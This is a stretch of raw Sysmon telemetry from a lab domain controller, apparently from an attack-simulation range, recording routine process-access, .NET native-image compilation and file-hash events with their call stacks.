21:06:59.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000022735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000022734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000022733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.321{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.321{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.321{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3B05-00000000CF01}6872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.321{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3B05-00000000CF01}6872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.305{4DB9351A-A273-60D3-3A05-00000000CF01}6860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VFS2QXL4M\Microsoft.Build.Engine.ni.dll.auxMD5=BF92107E0576E4D198F6D068DC662A2D,SHA256=0BD7D92847C86B6FF5C430CD99C181331EF8418B7A7A205C11703AFD97E245DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.305{4DB9351A-A273-60D3-3A05-00000000CF01}6860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VFS2QXL4M\Microsoft.Build.Engine.ni.dllMD5=FD41C3F7BE2F404019F7E1282FDAAC56,SHA256=0EE416BD58E8FA138B37C3A3ADF6CB2BFDFE022A253CE9D91FDA5096079139FD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.211{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3A05-00000000CF01}6860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.211{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CDDA2AC9D3E3E383AD56F1408B2B686,SHA256=0498473498B7E6AAFEC2FBB7D68D864313C9E455A10642BDC06B4161D2346D66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3A05-00000000CF01}6860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3A05-00000000CF01}6860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-A273-60D3-3905-00000000CF01}6492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1DSIK2ISDR\Microsoft.Build.Conversion.v4.0.ni.dll.auxMD5=7E87C3593F0EC212480E2F9F4FC5E27C,SHA256=7095A1E5C6A0ACE9F4167AEB85B216873EFA166DA4989D0F16DA01D98E695CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-A273-60D3-3905-00000000CF01}6492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1DSIK2ISDR\Microsoft.Build.Conversion.v4.0.ni.dllMD5=7080035273A93A2ABF2C55C15C958AC5,SHA256=91C98F2D2DE4B536E70E8870E0ABA5CA1083538FBAD1913532A4080EF6802BF2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3905-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3905-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3905-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-A272-60D3-3805-00000000CF01}6792NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UC5YTL9VOT\Microsoft.Build.ni.dll.auxMD5=6CB9F3672088B4E14F0A99EF6E13053E,SHA256=989EE2536A29D7EBF2A41CAACA88841CE117D55FDD2E1E90DB70FD3B86105218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-A272-60D3-3805-00000000CF01}6792NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UC5YTL9VOT\Microsoft.Build.ni.dllMD5=70A51AAB19E052AB5118FF11B6A158BA,SHA256=25F20F2C0C832FAA700265428A938896F0B75A0C15CEB5572BDEB8DC25E0BEED,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.949{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D86B1A60E7E6014B59F17A56ABFE155A,SHA256=BB5FA3DFE6C6A08249C4FE6807F2F46473AE4F03F453A406CE43B8C95C376CC6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.793{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0de0gyld.bbm.ps12021-06-23 21:07:00.793 10341000x800000000000000022853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4905-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4905-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4905-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.3031